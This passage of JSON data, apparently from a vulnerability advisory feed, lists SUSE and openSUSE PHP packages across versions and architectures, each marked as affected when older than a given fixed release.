"php5-exif-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-soap", "packageFilename": "php5-soap-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-wddx", "packageFilename": "php4-wddx-4.4.0-6.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-imap", "packageFilename": "php5-imap-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dba", "packageFilename": "php5-dba-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-dom", "packageFilename": "php5-dom-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-mysqli", "packageFilename": "php5-mysqli-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dba", "packageFilename": "php5-dba-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5", "packageFilename": "php5-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-pgsql", "packageFilename": "php4-pgsql-4.4.0-6.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-pear", "packageFilename": "php5-pear-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-devel", "packageFilename": "php5-devel-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-devel", "packageFilename": "php5-devel-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-gd", "packageFilename": "php5-gd-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pear", "packageFilename": "php5-pear-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pear", "packageFilename": "php5-pear-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-curl", "packageFilename": "php4-curl-4.3.10-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-imap", "packageFilename": "php4-imap-4.3.10-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-fastcgi", "packageFilename": "php4-fastcgi-4.4.0-6.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-pgsql", "packageFilename": "php4-pgsql-4.3.10-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-devel", "packageFilename": "php4-devel-4.3.10-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-imap", "packageFilename": "php5-imap-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-mysqli", "packageFilename": "php5-mysqli-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-imap", "packageFilename": "php5-imap-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pear", "packageFilename": "php5-pear-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-xmlrpc", "packageFilename": "php5-xmlrpc-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pear", "packageFilename": "php5-pear-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dba", "packageFilename": "php5-dba-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-devel", "packageFilename": "php5-devel-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-session", "packageFilename": "php4-session-4.3.10-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5", "packageFilename": "php5-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-devel", "packageFilename": "php5-devel-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-exif", "packageFilename": "php5-exif-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-gd", "packageFilename": "php4-gd-4.3.10-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5", "packageFilename": "php5-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-soap", "packageFilename": "php5-soap-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-soap", "packageFilename": "php5-soap-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5", "packageFilename": "php5-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-imap", "packageFilename": "php5-imap-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-devel", "packageFilename": "php5-devel-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-pgsql", "packageFilename": "php4-pgsql-4.3.10-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "9.3-7.14", "packageName": "php4-32bit", "packageFilename": "php4-32bit-9.3-7.14.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-imap", "packageFilename": "php5-imap-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5", "packageFilename": "php5-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-soap", "packageFilename": "php5-soap-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-soap", "packageFilename": "php5-soap-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5", "packageFilename": "php5-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5", "packageFilename": "php5-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-exif", "packageFilename": "php5-exif-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-exif", "packageFilename": "php5-exif-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-wddx", "packageFilename": "php4-wddx-4.4.0-6.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "apache2-mod_php4", "packageFilename": "apache2-mod_php4-4.3.10-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-mysqli", "packageFilename": "php5-mysqli-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dom", "packageFilename": "php5-dom-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysqli", "packageFilename": "php5-mysqli-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-imap", "packageFilename": "php5-imap-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-gd", "packageFilename": "php5-gd-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-curl", "packageFilename": "php5-curl-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-curl", "packageFilename": "php5-curl-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-exif", "packageFilename": "php5-exif-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-mbstring", "packageFilename": "php4-mbstring-4.3.10-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5", "packageFilename": "php5-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-xmlrpc", "packageFilename": "php5-xmlrpc-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-sysvshm", "packageFilename": "php5-sysvshm-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-curl", "packageFilename": "php5-curl-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-soap", "packageFilename": "php5-soap-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-devel", "packageFilename": "php5-devel-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dba", "packageFilename": "php5-dba-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5", "packageFilename": "php5-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-dom", "packageFilename": "php5-dom-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-devel", "packageFilename": "php5-devel-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-exif", "packageFilename": "php4-exif-4.4.0-6.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-imap", "packageFilename": "php5-imap-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-exif", "packageFilename": "php4-exif-4.4.0-6.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-dba", "packageFilename": "php5-dba-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "apache2-mod_php4", "packageFilename": "apache2-mod_php4-4.4.0-6.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-exif", "packageFilename": "php5-exif-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.0.4-9.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-devel", "packageFilename": "php4-devel-4.4.0-6.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5", "packageFilename": "php5-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-pgsql", "packageFilename": "php4-pgsql-4.4.0-6.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-imap", "packageFilename": "php5-imap-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-exif", "packageFilename": "php4-exif-4.3.10-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.32", "packageName": "php4-sysvshm", "packageFilename": "php4-sysvshm-4.3.10-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-ftp", "packageFilename": "php5-ftp-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-xmlrpc", "packageFilename": "php5-xmlrpc-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-curl", "packageFilename": 